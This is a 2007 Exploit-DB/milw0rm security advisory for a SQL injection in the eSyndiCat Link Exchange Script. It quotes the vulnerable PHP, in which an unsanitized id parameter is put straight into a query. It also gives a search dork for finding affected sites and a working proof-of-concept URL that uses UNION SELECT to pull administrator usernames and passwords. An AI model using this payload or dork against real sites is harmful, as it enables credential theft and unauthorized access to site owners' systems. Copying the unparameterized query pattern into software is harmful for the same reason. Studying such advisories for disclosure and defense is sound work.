eSyndiCat Link Exchange Script 2005-2006 - SQL Injection

EDB-ID:

4791

Author:

EgiX

Type:

webapps

Platform:

PHP

Published:

2007-12-25

--------------------------------------------------------------
eSyndiCat Link Exchange Script - Remote SQL Injection Advisory
--------------------------------------------------------------

author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com

link.....: http://www.esyndicat.com/
dork.....: "© 2005-2006 Powered by eSyndiCat Link Exchange Script"
details..: works with magic_quotes_gpc = off

[-] Vulnerable code in /suggest-link.php :

	30.	/** gets information about current category **/
	31.	$category =& $gDirDb->getCategoryById($_GET['id']);
	32.	$gDirSmarty->assign_by_ref('category', $category);

[-] getCategoryById function defined in /classes/Dir.php :

	323.	function getCategoryById($aCategory)
	325.	{
	326.		$sql = "SELECT * FROM `{$this->mPrefix}categories` ";
	327.		$sql .= "WHERE `id` = '{$aCategory}'";
	328.
	329.		return $this->mDb->getRow($sql);
	330.	}


[*] An attacker can break database through browser! P.o.C. :

http://[host]/[path]/suggest-link.php?id=-1'/**/UNION/**/SELECT/**/1,1,1,password,1,1,1,1,username,1,1/**/FROM/**/dir_admins/*

# milw0rm.com [2007-12-25]